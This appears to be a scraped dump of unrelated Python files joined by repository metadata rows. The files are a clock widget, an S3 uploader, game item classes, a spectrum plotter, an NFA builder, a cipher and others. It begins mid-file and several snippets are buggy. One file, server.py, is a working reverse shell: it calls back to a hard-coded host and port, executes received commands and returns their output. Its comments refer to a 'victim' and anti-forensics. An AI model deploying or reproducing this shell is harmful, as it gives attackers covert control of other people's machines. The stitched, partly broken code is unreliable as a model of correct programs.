timer = QTimer(self)
timer.timeout.connect(self.showTime)
timer.start(1000)
self.showTime()
self.setWindowTitle("Digital Clock")
self.resize(150, 60)
def showTime(self):
time = QTime.currentTime()
text = time.toString('hh:mm')
if (time.second() % 2) == 0:
text = text[:2] + ' ' + text[3:]
self.display(text)
import sys
app = QApplication(sys.argv)
clock = DigitalClock()
clock.show()
sys.exit(app.exec_()) | true |
712bfa1d9fc2476c22fd135f2332df416e25bdf0 | Python | vparikh10/facial-expression-classifier | /fec/classifier/gl_data.py | UTF-8 | 2,096 | 2.625 | 3 | [] | no_license | import numpy as np
from boto.s3.connection import S3Connection
import os
from filechunkio import FileChunkIO
import math
import pandas as pd
_conn = None
def get_connection():
"""Get the boto connection to Amazon S3
This method assumes the environment variables AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY have been set
:return: s3 connection
"""
global _conn
if _conn is None:
_conn = S3Connection(os.environ['AWS_ACCESS_KEY_ID'],
os.environ['AWS_SECRET_ACCESS_KEY'])
return _conn
def upload_big_file(source_path, bucket):
"""Upload a large file to S3 in chunks
:param source_path: path to the file
:param bucket: s3 bucket string to load to
:return:
"""
source_size = os.stat(source_path).st_size
mp = bucket.initiate_multipart_upload(os.path.basename(source_path))
chunk_size = 52428800
chunk_count = int(math.ceil(source_size / chunk_size))
for i in range(chunk_count + 1):
offset = chunk_size * i
bytes = min(chunk_size, source_size - offset)
with FileChunkIO(source_path, 'r', offset=offset,
bytes=bytes) as fp:
mp.upload_part_from_file(fp, part_num=i + 1)
mp.complete_upload()
def _load_original_data_into_df(file_path):
df = pd.read_csv(file_path)
df = df.rename(columns={'Usage': 'usage', 'Emotion': 'label'})
df['pixels'] = df['pixels'].apply(lambda x:
np.fromstring(x, sep=' ', dtype=int))
return df
if __name__ == '__main__':
fer_data = '/Users/chris/Downloads/fer2013/fer2013.csv'
df = _load_original_data_into_df(fer_data)
this_path = os.path.abspath(__file__)
this_dir, _ = os.path.split(this_path)
df_path = os.path.join(this_dir, 'data', 'django_expression.pkl')
df.to_pickle(df_path)
# df.to_csv('/Users/chris/tmp/fer_processed.csv')
# con = get_connection()
# bucket = con.get_bucket('cmgreen210-emotions')
# upload_big_file('/Users/chris/tmp/fer_processed.csv',
# bucket)
| true |
f8ab8524e8caae4e35e1a6360a1a74cc58c2d5a2 | Python | Lan2008-StudioPro/Python_Singular | /Homework/20210321/t2_climate.py | UTF-8 | 560 | 4.34375 | 4 | [] | no_license | #溫度問題
while True:
a=input('今天攝氏幾度?')
try:
a=int(a)
except:
print('蛤?我問你溫度你回答這什麼鬼東西?')
else:
if a>=40:
print('怎麼可能?這麼熱!')
elif a<=10:
print('天哪!太冷了吧~')
else:
print('真舒適的溫度!')
"""
Topic:輸入溫度,如果溫度>=40度C,顯示: 太熱,
如果溫度<= 10 顯示:太冷, 其他:舒適:
Show:Please input temperature:"
Input1:40
Output:It's too hot.
""" | true |
b0e9b6eecb284ae06b2169c65d1d99aa90802b34 | Python | py2-10-2017/MatthewKim | /Fundamentals/DebuggingLearn.py | UTF-8 | 120 | 3.34375 | 3 | [] | no_license | def multiply(arr,num):
for x in arr:
arr[x] *= num
return x
a = [2,4,10,16]
b = multiply(a,5)
print b
| true |
8444472261faf517ddb82e348afe0690bd4c7b45 | Python | SHawkeye77/game_1 | /items_all/items_research_dome.py | UTF-8 | 6,261 | 3.171875 | 3 | [] | no_license | """
Holds items specifically made in the research dome
"""
from items import Item
from items_all.items_general import *
############################# Achebe Office Items ############################
class WetWipes(Item):
def __init__(self):
super().__init__(name=["Wet Wipes", "Wipes"], can_pick_up=True,
description="A pack of antibacterial wet wipes")
class Drawers(Item):
def __init__(self, description="A set of desk drawers."):
super().__init__(name=["Drawers","Drawer"],can_pick_up=False,
description=description)
def interact(self, player):
print("You open up the drawers. Inside, there are some post-it "
"notes, wet wipes, and a book with the title: \"The Sirens of "
"Titan\".")
class AchebePhd(Item):
def __init__(self):
super().__init__(name=["PhD Certificate", "Certificate"],
description="A framed, mechanical engineering PhD Certificate "
"from University College London", can_pick_up=True)
class Altoids(Food):
def __init__(self):
super().__init__(name=["Tin of Altoids", "Altoids"],
description="A small red tin labeled \"ALTOIDS - CURIOUSLY "
"STRONG MINTS\"", eat_response="Curiously strong! Yum!")
class Poster(Item):
def __init__(self):
super().__init__(name=["Movie Poster", "Poster", "Star Wars Poster"],
can_pick_up=True, description="It's in another language, but it "
"depicts a man on a hill next to a woman and two robots. "
"A dark head looms behind them. The signature "
"says \"Carrie Fisher\".")
class Pen(Item):
def __init__(self, description="A gold and black ballpoint pen. It "
"says \"Montblanc\" on it."):
super().__init__(name=["Pen"], can_pick_up=True, description=\
description)
def use(self, item, player):
if "paper" in [name.lower() for name in item.name]:
w = input("What do you want to write on the paper? ")
print("You write \"" + w + "\" on the paper.")
else:
print("Nothing happens.")
class PostItNotes(Item):
def __init__(self):
super().__init__(name=["Post-It Notes", "Post It Notes", "Post It"],
can_pick_up=True, description="A set of yellow Post-It notes")
############################# Gomez Office Items ############################
class WhiskeyGlass(Item):
    # Gomez office: simple carryable prop.
    def __init__(self):
        super().__init__(name=["Whiskey Glass", "Glass"], can_pick_up=True,
            description="A small glass for booze")
############################## Zlo Office Items #############################
class ArmChair(Item):
    # Fixed furniture with a one-line flavor interaction.
    def __init__(self):
        super().__init__(name=["Armchair", "Arm Chair", "Comfy Chair",
            "Lounge Chair"], can_pick_up=False, description="A red-checkered "
            "armchair. Looks pretty comfy!")
    def interact(self, player):
        print("Ah, just as comfy as it looked!")
class NobelPrize(Item):
    # interact() reveals the reverse side of the medal.
    def __init__(self):
        super().__init__(name=["Award", "Framed Award", "Nobel Prize"],
            can_pick_up=True, description="It's a golden coin about the size "
            "of two quarters. It's engraved with the portrait of a man "
            "and the phrases \"Nat. MDCCCXXXIII Ob. MDCCCXCVI\" and "
            "\"ALFR. NOBEL\"")
    def interact(self, player):
        print("Flipping it over you can see the inscriptions on the back: "
            "\"Inventas vitam iuvat excoluisse per artes\", "
            "\"REG. ACAD. SCIENT. SUEC.\", \"Erik Lindberg\", and \"O. ZLO "
            "MMXXX\"")
class RussianNestingDoll(Item):
    # Stateful item: each interact() removes one of `layers` shells.
    def __init__(self):
        self.times_opened = 0  # shells removed so far
        self.layers = 5  # shells before the hidden center
        super().__init__(name=["Russian Nesting Doll", "Nesting Doll", "Doll"],
            can_pick_up=True, description="A nesting doll. A faded drawing "
            "of a babushka is on it.")
    def interact(self, player):
        self.times_opened += 1
        if (self.times_opened >= self.layers):
            # NOTE(review): unfinished -- the center reward is still a stub.
            print("TODO") # PRESENT PLAYER WITH SOMETHING THAT'S HIDING IN THE CENTER!!!!!!!!!!!!!!!!!!!!
        else:
            print("You remove a layer from the doll. Another babushka smiles "
                "back at you.")
class Map(Item):
    def __init__(self, description="A huge map nailed into the wall. "
        "Its description reads: \"Czechoslovakia 1970\"."):
        super().__init__(name=["Map", "Czechoslovakia Map"],
            can_pick_up=False, description=description)
class NewtonsCradle(Item):
    def __init__(self):
        super().__init__(name=["Newtons Cradle", "Newton's Cradle", "Cradle"], can_pick_up=True,
            description="The five-ball classic physics toy")
    def interact(self, player):
        print("You pull back and let go one of the balls.\nTick - Tick - Tick - Tick..."
            "\nThe motion slowly fades out...")
class Scarf(Item):
    # NOTE(review): default description is "" -- probably meant to have text.
    def __init__(self, description=""):
        super().__init__(name=["Scarf", "C.D. Oro Scarf"], can_pick_up=True, description=description)
    def interact(self, player):
        print("You wave it around your head like a football ultra.")
class EspressoMachine(Item):
    def __init__(self):
        super().__init__(name=["Espresso Machine", "Espresso"], can_pick_up=False,
            description="A black Nespresso espresso machine. Looks like it takes espresso pods, none of which "
            "seem to be anywhere nearby. Shame, you could use a shot...")
    def interact(self, player):
        print("You turn it on and within seconds hot water begins to flow out, tainting the already "
            "coffee-stained papers even more.")
class ScatteredPapers(Item):
    def __init__(self):
        super().__init__(name=["Scattered Papers", "Papers", "Notes", "Scattering of Papers"], can_pick_up=False,
            description="An unorganized jumble of research notes and legal paperwork. Most are coffee-stained.")
    def interact(self, player):
        print("Picking up a sheet you start reading:\n\"AN ANALYSIS OF EXTREME SURVIVAL CAPABILITY ASSETS IN "
            "TARDIGRADES\"\nConfusing... You pick up another:\n\"TERRAN ITEM RETRIEVEMENT REQUEST FORM\"\n"
"It's not filled out.") | true |
708333088d6d79c3df015aa2450c2691903a5793 | Python | SMG2S/SMG2S | /scripts/verification.py | UTF-8 | 4,885 | 2.546875 | 3 | [
"MIT"
] | permissive | '''
MIT License
Copyright (c) 2019 Xinzhe WU @ Maison de la Simulation, France
Copyright (c) 2019-2022, Xinzhe Wu @ Simulation and Data Laboratory Quantum
Materials, Forschungszentrum Juelich GmbH.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import scipy.io
from tabulate import tabulate
import matplotlib.pyplot as plt
import numpy as np
from scipy.sparse.linalg import eigs, spsolve
import scipy.sparse as sp
import pandas as pd
import argparse
from matplotlib.patches import Rectangle
import matplotlib.colorbar as cbar
import matplotlib.cm as cm
import matplotlib.collections as collections
from numpy import linalg as LA
#load sparse matrix from MatrixMarket format
#output is in COO format
def loadMatrix(filename):
    """Read a matrix from a MatrixMarket (.mtx) file.

    scipy.io.mmread returns sparse input in COO format, dense input as
    an ndarray; the result is passed straight through.
    """
    return scipy.io.mmread(filename)
#load vector from files following the format of SMG2S
def loadVector(filename):
    """Load a vector written in the SMG2S text format.

    The file has a one-line header, '%' comment lines, and whitespace
    separated columns: (index, real, imag) for a complex vector or
    (index, value) for a real one.

    Returns a 1-D numpy array (complex when three columns are present).
    Raises ValueError for any other column count.
    """
    # `delim_whitespace=True` is deprecated (removed in pandas 3.0);
    # sep=r'\s+' is the documented equivalent.
    df = pd.read_csv(filename, comment="%", sep=r'\s+')
    ncols = df.shape[1]
    if ncols == 3:
        # column 1 = real part, column 2 = imaginary part
        return df[df.columns[1]].to_numpy() + 1j * df[df.columns[2]].to_numpy()
    if ncols == 2:
        return df[df.columns[1]].to_numpy()
    raise ValueError('Oops! The given vector file is not in good format')
def spy_coo(M, ax, type="pattern"):
    """Draw the sparsity pattern of M onto the matplotlib axes `ax`.

    M is converted to COO if necessary and each stored entry becomes a
    unit square.  With type="heatmap" the squares are colored by |value|.
    (`type` shadows the builtin, but the name is kept so existing
    keyword calls keep working.)  Returns `ax` for chaining.
    """
    if not isinstance(M, sp.coo_matrix):
        M = sp.coo_matrix(M)
    # One unit square per stored (row, col) entry; x = column, y = row.
    verts = [((x-0.5, y-0.5), (x-0.5, y+0.5), (x+0.5, y+0.5), (x+0.5, y-0.5))
             for (x, y) in zip(M.col, M.row)]
    c = collections.PolyCollection(verts)
    if type == "heatmap":
        c.set_array(np.absolute(M.data))
        c.set_cmap(cm.Wistia)
    ax.add_collection(c)
    # Fit the axes to the matrix extent.  (The original first set the
    # limits to (-1, 8) and immediately overwrote them -- dead code,
    # removed.)
    ax.set_xlim(-0.5, M.shape[1]-0.5)
    ax.set_ylim(-0.5, M.shape[0]-0.5)
    ax.invert_yaxis()  # row 0 at the top, like a printed matrix
    ax.set_aspect(float(M.shape[0])/float(M.shape[1]))
    ax.set_xticks([])
    ax.set_yticks([])
    ax.set_title("sparsity pattern")
    return ax
def plot_spectrum(input, estimate, ax):
    """Scatter the given spectrum (black dots) and the computed
    eigenvalues (red '+' markers) in the complex plane on axes `ax`.

    (`input` shadows the builtin; the name is kept for backward
    compatible keyword calls.)  Returns `ax` for chaining.
    """
    def _parts(values):
        # Real parts, plus imaginary parts (0.0 for purely real entries,
        # mirroring the original np.iscomplex branch).
        xs, ys = [], []
        for v in values:
            xs.append(v.real)
            ys.append(v.imag if np.iscomplex(v) else 0.0)
        return xs, ys

    x_in, y_in = _parts(input)
    x_e, y_e = _parts(estimate)
    ax.scatter(x_in, y_in, c='black')
    ax.scatter(x_e, y_e, marker="+", c='r')
    ax.set_ylabel('Imaginary')
    ax.set_xlabel('Real')
    # BUG FIX: the original read the limits from the module-global `ax2`
    # instead of the `ax` parameter, so the function crashed unless it
    # happened to be called from the __main__ block below.
    asp = np.diff(ax.get_xlim())[0] / np.diff(ax.get_ylim())[0]
    ax.set_aspect(asp)
    ax.legend(['Given spectrum', 'Computed eigenvalues'])
    ax.set_title("spectrum")
    return ax
def compute_spectrum(M):
    """Densify the (sparse) matrix and return numpy.linalg.eig's
    (eigenvalues, eigenvectors) pair unchanged."""
    return LA.eig(M.toarray())
if __name__ == '__main__':
    # CLI driver: plot the sparsity pattern of a generated matrix and,
    # with --verify, also overlay its computed eigenvalues on the
    # spectrum that was used to generate it.
    parser = argparse.ArgumentParser(description='verification of matrices generated matrices to keep given spectra')
    parser.add_argument("--matpath", help='path of matrix to be plotted or verified. Matrix should be in MatrixMarket format', default="data/testmatrix_cmplx.mtx")
    parser.add_argument("--specpath", help='path of spectrum to be verified which is used to generate the related matrix. Vector should be in SMG2S vector file format', default="data/given_spectrum_cmplx.txt")
    parser.add_argument('--verify', help='if only plotting patterns or also verifying the spectrum: default false' ,action='store_true')
    value = parser.parse_args()
    M=loadMatrix(value.matpath)
    fig = plt.figure()
    if value.verify:
        spec = loadVector(value.specpath)
        # compute_spectrum returns numpy.linalg.eig's (values, vectors) pair.
        eigenvalues, _ = compute_spectrum(M)
        ax = fig.add_subplot(121)
        ax = spy_coo(M, ax)
        # NOTE(review): check plot_spectrum's aspect computation -- it
        # references the name `ax2`, so keep this variable name.
        ax2 = fig.add_subplot(122)
        ax2 = plot_spectrum(spec, eigenvalues, ax2)
    else:
        ax = fig.add_subplot(111)
        ax = spy_coo(M, ax)
    plt.tight_layout()
    plt.show()
| true |
e8885c972bf210344f8d892ba43b2eb4537589c4 | Python | erosethan/Proyecto-Compiladores-1 | /main.py | UTF-8 | 517 | 2.78125 | 3 | [] | no_license | #!/usr/bin/python
import automata, nodo, expreg
# Read a regular expression from stdin, build its Thompson NFA and the
# equivalent DFA, and render both as images (AFN = NFA, AFD = DFA).
entrada = input()
# Mark explicit concatenation operators, then convert infix -> postfix.
expresionRegular = expreg.marcarConcatenacion(entrada)
print(entrada + ' ===> ' + expresionRegular + '\n')
expresionRegular = expreg.infijaAPosfija(expresionRegular)
# Thompson construction yields the NFA start state.
inicioAutomata = automata.expregAThompson(expresionRegular)
automata.generarImagen(inicioAutomata, 'AFN')
# Determinize (subset construction) over the expression's alphabet.
alfabeto = expreg.obtenerAlfabeto(expresionRegular)
inicioAutomata = automata.thompsonADeterminista(inicioAutomata, alfabeto)
automata.generarImagen(inicioAutomata, 'AFD')
| true |
944be212b7f66b29ba240ab8703291f9cc863192 | Python | zzong2006/coding-problems-study | /pythonProject/leetcode/First Missing Positive.py | UTF-8 | 514 | 3.09375 | 3 | [] | no_license | from typing import List
class Solution:
    def firstMissingPositive(self, nums: List[int]) -> int:
        """Return the smallest positive integer absent from nums.

        Simplification of the original: a single membership scan over a
        set already covers the empty and all-non-positive special cases
        that were branched on explicitly (and it avoids the extra
        max() pass).  O(n) time and space; nums is not mutated.
        """
        present = set(nums)
        candidate = 1
        while candidate in present:
            candidate += 1
        return candidate
a = Solution()
print(a.firstMissingPositive([3, 4, -1, 1]))
| true |
125d0ffd669a416346ee2edcc48baabf61b8e14f | Python | edu-sense-com/OSE-Python-Course | /SPP/Modul_05/przestawieniowe.py | UTF-8 | 3,626 | 3.953125 | 4 | [
"MIT"
] | permissive | class Skaut_Cipher:
def __init__(self, text: str, direction: str="E") -> None:
"""
direction: E -> for encryption - default
direction: D -> for decryption
"""
self.direction = direction
self.input_text = text.upper() if self.direction == "E" else ""
self.text_encrypted = text.upper() if self.direction == "D" else ""
self.text_decrypted = ""
self.cipher_types = ("GP", "MC")
self.cipher_type = None
self.cipher_ok = False
self.codes_enc_gp = ("G", "D", "R", "P", "L", "K")
self.codes_dec_gp = ("A", "E", "Y", "O", "U", "I")
self.codes_enc_mc = ("M", "T", "L", "C", "D", "K")
self.codes_dec_mc = ("O", "Y", "E", "U", "A", "I")
def change_letters(self, text: str, codes_in: tuple, codes_out: tuple)-> str:
returned_text = ""
for letter in text:
if letter in codes_in:
pos = codes_in.index(letter)
letter = codes_out[pos]
elif letter in codes_out:
pos = codes_out.index(letter)
letter = codes_in[pos]
returned_text += letter
return returned_text
def encrypt(self, cipher: str) -> bool:
self.cipher_type = cipher
self.cipher_ok = self.cipher_type in self.cipher_types
if not self.cipher_ok:
return False
if self.direction != "E":
return False
if self.cipher_type == "GP":
self.text_encrypted = self.change_letters(self.input_text, self.codes_enc_gp, self.codes_dec_gp)
elif self.cipher_type == "MC":
self.text_encrypted = self.change_letters(self.input_text, self.codes_enc_mc, self.codes_dec_mc)
return True
def decrypt(self, cipher: str) -> bool:
self.cipher_type = cipher
self.cipher_ok = self.cipher_type in self.cipher_types
if not self.cipher_ok:
return False
if self.direction != "D":
return False
if self.cipher_type == "GP":
self.text_decrypted = self.change_letters(self.text_encrypted, self.codes_dec_gp, self.codes_enc_gp)
elif self.cipher_type == "MC":
self.text_decrypted = self.change_letters(self.text_encrypted, self.codes_dec_mc, self.codes_enc_mc)
return True
def output(self) -> None:
print(f"Input: {self.input_text}")
print(f"Encrypted: {self.text_encrypted}")
print(f"Decrypted: {self.text_decrypted}")
    def return_encrypted(self) -> str:
        # Plain accessor for the encryption buffer (see __init__/encrypt()).
        return self.text_encrypted
    def return_decrypted(self) -> str:
        # Plain accessor for the decryption buffer (see __init__/decrypt()).
        return self.text_decrypted
# Example invocation:
#
t1 = Skaut_Cipher("G D R P L K - A B C")
t1.encrypt("GP")
t1.output()
# decrypt() is a no-op here: t1 was built with direction "E".
t1.decrypt("GP")
t1.output()
print(f"Encrypted text: {t1.return_encrypted()}")
print(f"Decrypted text: {t1.return_decrypted()}")
print("--------------------------------------------")
# Same text from the other side: direction "D" only allows decryption.
t2 = Skaut_Cipher("A E Y O U I - G B C", "D")
# encrypt() is a no-op here for the same reason.
t2.encrypt("GP")
t2.output()
t2.decrypt("GP")
t2.output()
print(f"Encrypted text: {t2.return_encrypted()}")
print(f"Decrypted text: {t2.return_decrypted()}")
#
# Input: G D R P L K - A B C
# Encrypted: A E Y O U I - G B C
# Decrypted:
# Input: G D R P L K - A B C
# Encrypted: A E Y O U I - G B C
# Decrypted:
# Encrypted text: A E Y O U I - G B C
# Decrypted text:
# --------------------------------------------
# Input:
# Encrypted: A E Y O U I - G B C
# Decrypted:
# Input:
# Encrypted: A E Y O U I - G B C
# Decrypted: G D R P L K - A B C
# Encrypted text: A E Y O U I - G B C
# Decrypted text: G D R P L K - A B C
| true |
1e1a1215e058abea0dfeb04b584c726bb22f195d | Python | jhelphenstine/python-class-exercises | /server.py | UTF-8 | 3,221 | 2.921875 | 3 | [] | no_license | #!/usr/bin/python
# Task: Implement a server to run on an Ubuntu system. It must:
# -- hold a port
# -- receive commands -- in the form of command-line arguments
# -- execute commands -- via os library
# -- return the results -- capture stdout/stderr...
# immediate considerations:
# we'll need sockets
# we'll need pickling or json-ing; i think i'll prefer the pickle to impose
# antiforensics costs
# Must EITHER callback OR listen... I think I'd rather...have it call back.
# That means the client will bind and the server will...well that's an odd
# way of thinking about it; having a server initiate the connection? I'm kindof
# reversing the paradigm there...but once the connection is established, the server
# will service client activity, so we'll just roll with that.
import socket
import os # return values
import ipaddress # Is this necessary?
import re # for passphrase
import sys # for exit
import subprocess # for commands
import pickle # for transfer
import select # for black magic
trinity = "127.0.0.1"
nebuchadnezzar = 31337
def sessionStartup(s):
    """Perform the magic-string handshake on the connected socket `s`.

    SECURITY NOTE (review): this module implements a reverse-shell style
    client that executes remote commands -- treat it strictly as
    educational/demo code and do not deploy it.
    """
    # We're using a magic string for our initialization; we'll try 3 times and otherwise fail out.
    # NOTE(review): range(1, 3) makes only 2 attempts, not the 3 the
    # comment above promises.
    for i in range(1,3):
        s.sendall("ATDT18005551234".encode())
        signal = s.recv(512)
        if re.search("ATA", signal.decode()):
            s.sendall("CONNECT".encode())
            return True
    # If Trinity doesn't pick up, we're screwed
    return False
def main():
    """Dial out to the hard-coded peer and service its command requests.

    SECURITY NOTE (review): this is a reverse shell -- it connects to
    `trinity`:`nebuchadnezzar`, executes whatever whitespace-split
    command line the peer sends (via subprocess) and returns the pickled
    result.  Educational code only; do not deploy.
    """
    # What, do you think I'd print a banner for the victim? Pshaw.
    # print("Initializing server. Please stand by while your system initiates an unauthorized connection...")
    #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Aren't these the default parameters?
    connectionEstablished = False
    while True:
        try:
            #s.connect((trinity, nebuchadnezzar)) # Tee-hee
            # This line gets us both socket.socket && socket.connect
            s = socket.create_connection((trinity, nebuchadnezzar))
            # From a SO question on TCP keepalives
            s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
            s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)
            s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 3)
            s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
        except OSError as e:
            # As they say in PowerShell...SilentlyContinue
            # NOTE(review): despite the outer `while True`, any connect
            # error aborts immediately -- there is no retry/backoff.
            return -1
        if not connectionEstablished:
            result = sessionStartup(s)
            connectionEstablished = True
            if not result:
                return -1
        while True:
            #print("I'm listening") # DEBUG
            #s.setblocking(0)
            # Block up to 300 s waiting for the peer to become readable.
            ready = select.select([s], [], [], 300)
            # NOTE(review): if select() times out, ready[0] is empty and
            # this inner loop busy-spins forever without calling select
            # again.
            while (True):
                if ready[0]:
                    instruction = s.recv(4096)
                    parsedInstructions = instruction.decode().split()
                    break
            try:
                # DANGER: arbitrary remote command execution.
                results = subprocess.run(parsedInstructions, capture_output=True)
                p = pickle.dumps(results)
            except OSError as e:
                msg = f"Error encountered: {e}"
                p = pickle.dumps(msg)
            except IndexError as e:
                # This should be taken as a sign the client is done with us
                s.close()
                return 0
            try:
                s.sendall(p)
            except OSError as e:
                #print(f"Error encountered: {e}") # DEBUG
                pass
if __name__ == "__main__":
sys.exit(main())
| true |
e43b789c39d64d3991b7118f85f02c82cb605a14 | Python | bpull/FST | /fornick/split.py | UTF-8 | 276 | 2.921875 | 3 | [] | no_license | fp = open("tickers.txt","r")
fp2=open("companies.txt","w")
# NOTE(review): neither fp (opened on the line above) nor fp2 is ever
# closed; `with open(...)` blocks would be safer.
for line in fp:
    newlist = []
    # Keep the words that precede the literal token "reports".
    for word in line.split():
        if word == "reports":
            break
        else:
            newlist.append(word)
    # Write "<first word> <space-joined remainder>".
    # NOTE(review): raises IndexError on a line whose first word is
    # "reports" (newlist would be empty).
    fp2.write(newlist.pop(0) + " "+" ".join(newlist)+"\n")
| true |
0590e7cc54b683444f9eff18fddb3ee9732e9382 | Python | MichaelPHartmann/Custom-Analysis-Tools | /main.py | UTF-8 | 799 | 2.65625 | 3 | [] | no_license | """
This is the general working file for accessing the different analysis tools.
All of the tools will be accessed from here to keep clutter down and keep the modules clean.
This also may be used for developing new tools, but they must be moved to their own modules when done.
Export or pickling may happen here for now but eventually a suite of auxiliary functions to handle spreadsheets will be created.
"""
import cairo
from FinMesh.iex import stock
# Cairo uses key stats, balance sheet, and price data
class CustomStockAnalysis:
    """Scratch container for a list of analysis method names.

    Hoisted out of the __main__ guard so it can be imported by other
    modules (run-as-script behavior is unchanged).
    """

    def __init__(self, methods):
        # Keep the caller's list of method names on the instance.
        self.m = methods

    def print_methods(self):
        """Print the stored method names."""
        # BUG FIX: the original printed the module-global `methods`,
        # which only worked because the demo below happens to define it;
        # use the instance state instead.
        print(self.m)

if __name__ == '__main__':
    methods = ['Cairo', 'Berlin', 'Delhi']
    ut = CustomStockAnalysis(methods)
ut.print_methods()
| true |
805c7c4fd5e848a6988eab6846b7f9546adc3a78 | Python | techsharif/python_training_2021 | /day1/function.py | UTF-8 | 89 | 3 | 3 | [] | no_license | # def hello ():
# print("hello")
# hello()
def add(a, b):
    """Print the sum of a and b (prints rather than returns, as before)."""
    total = a + b
    print(total)
add(4, 5) | true |
d6122eb9d0b547020a0d0e0de14335f3af383ee1 | Python | PEDSnet/Data-Quality-Analysis | /Tools/ConflictResolution/resolvers/ba_001.py | UTF-8 | 2,591 | 2.90625 | 3 | [
"BSD-2-Clause"
] | permissive | # function to resolve conflicts from log file
# Inputs: (i) log_issue - an object read the log file (ii) secondary_issue - a similar issue read from the secondary
# report,
# (iii) threshold_l, and threshold_u are the thresholds corresponding to the check type CA-006
# returns a set of objects that would replace the secondary_issue in the secondary report
import re
perct_re = re.compile(r'(\d+(?:\.\d+)?)')
def extract_miss(s):
    """Parse the leading percentage number out of a finding string.

    "12% missing"  -> 12   (int)
    "12.5% ..."    -> 12.5 (float)
    Returns None when the string does not start with a number.
    """
    # The pattern is matched inline (re caches compiled patterns), which
    # keeps this function self-contained.
    m = re.match(r'(\d+(?:\.\d+)?)', s)
    if not m:
        return None
    p = m.group()
    # Prefer an int when there is no fractional part; the original used
    # a bare `except:` (which would also swallow KeyboardInterrupt etc.)
    # around int() to the same effect.
    try:
        return int(p)
    except ValueError:
        return float(p)
def resolve(log_issue, secondary_issue, threshold_l, threshold_u):
    """Reconcile a log-file issue with its counterpart from the
    secondary report.

    Builds the set of Issue objects (including a CA-006 "missingness
    changed" issue when warranted) that should replace
    ``secondary_issue`` in the secondary report.  Returns None when the
    missingness percentage did not change at all, otherwise a (possibly
    empty) list of Issue objects.
    """
    pct_prev = extract_miss(secondary_issue.finding)  # previous cycle
    pct_curr = extract_miss(log_issue.finding)        # current cycle
    if pct_prev is None:
        raise ValueError('no missing percentage in secondary issue')
    if pct_curr is None:
        raise ValueError('no missing percentage in log issue')
    delta = pct_curr - pct_prev
    if delta == 0:
        # Same finding as last cycle: nothing to replace.  (Returns
        # None here, not an empty list, as the original did.)
        return
    # Issue describing the change itself (check CA-006).
    diff_issue = log_issue.copy()
    diff_issue.check_code = 'CA-006'
    diff_issue.check_type = ('unexpected change in missingness of a field '
                             'between data cycles')
    diff_issue.finding = str(delta) + '%'
    diff_issue.status = 'new'
    # The old secondary-report issue refreshed with the latest finding.
    refreshed = secondary_issue.copy()
    refreshed.finding = str(pct_curr) + '%'
    # Either endpoint at 100% missing, or a change outside the
    # [threshold_l, threshold_u] band, counts as out of range.
    out_of_range = (pct_prev == 100 or pct_curr == 100
                    or delta > threshold_u or delta < threshold_l)
    in_range = threshold_l < delta < threshold_u
    replacements = []
    if secondary_issue.status == 'under review':
        if out_of_range:
            replacements.extend((diff_issue, refreshed))
        if in_range:
            replacements.append(refreshed)
    elif secondary_issue.status == 'persistent':
        if out_of_range:
            replacements.extend((diff_issue, log_issue))
        if in_range:
            replacements.append(refreshed)
    return replacements
| true |
e575a68d176957788541953feec141022412d060 | Python | Mathakgale/level-0-coding-challenge | /task1.py | UTF-8 | 105 | 3.703125 | 4 | [] | no_license |
x = 0
y = 1
print(f"x = {x}")
print(f"y = {y}")
x = x + 3
y = y + x
print(f"x = {x}")
print(f"y = {y}") | true |
2df354300958188d20f0eabd5d791146f0215c6d | Python | wsgan001/PyFPattern | /Data Set/bug-fixing-5/a9efceb30baa6002b4ea7f551c94f5e65e9d6f41-<_label_path_from_index>-fix.py | UTF-8 | 475 | 2.640625 | 3 | [] | no_license | def _label_path_from_index(self, index):
'\n given image index, find out annotation path\n\n Parameters:\n ----------\n index: int\n index of a specific image\n\n Returns:\n ----------\n full path of annotation file\n '
label_file = os.path.join(self.data_path, 'Annotations', (index + '.xml'))
assert os.path.exists(label_file), 'Path does not exist: {}'.format(label_file)
return label_file | true |
577438bcffa25dd5552a557e661b88db540ae9dc | Python | Aasthaengg/IBMdataset | /Python_codes/p02712/s061370665.py | UTF-8 | 189 | 3.203125 | 3 | [] | no_license | N = int(input())
ans = [0] * (N+1)
for i in range(N+1):
if i % 3 != 0 and i % 5 != 0 and i % 15 != 0:
ans[i] = ans[i-1] + i
else:
ans[i] = ans[i-1]
print(ans[-1])
| true |
897f9ae2bab6ea1212577bfecc210e17a737b78f | Python | JiachenLi/PythonLearning | /emailaddress2.py | UTF-8 | 351 | 3 | 3 | [] | no_license | # !/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module '
__author__ = 'Jiachen Li'
import re
def name_of_email(addr):
s = str(addr)
m = re.match(r'/^\<([a-zA-Z\s]+)\>\s([a-zA-Z][a-zA-Z\d\_\.]*@[a-zA-Z\d]+\.[a-zA-Z]{2,3})$/', s)
if m:
print(m.group(1))
else:
print('can\'t get the name of email') | true |
1811d475dff7f4d0cec5289ec42b86008cad493b | Python | nosleep123/shawn-sascode | /Scraper.py | UTF-8 | 3,856 | 2.734375 | 3 | [] | no_license |
import logging
import os
DEFAULT_DATA_PATH = os.path.abspath(os.path.join(
os.path.dirname('/Users/shuhao/PycharmProjects/Learning/data/SEC'), '..', 'SEC-Edgar-Data'))
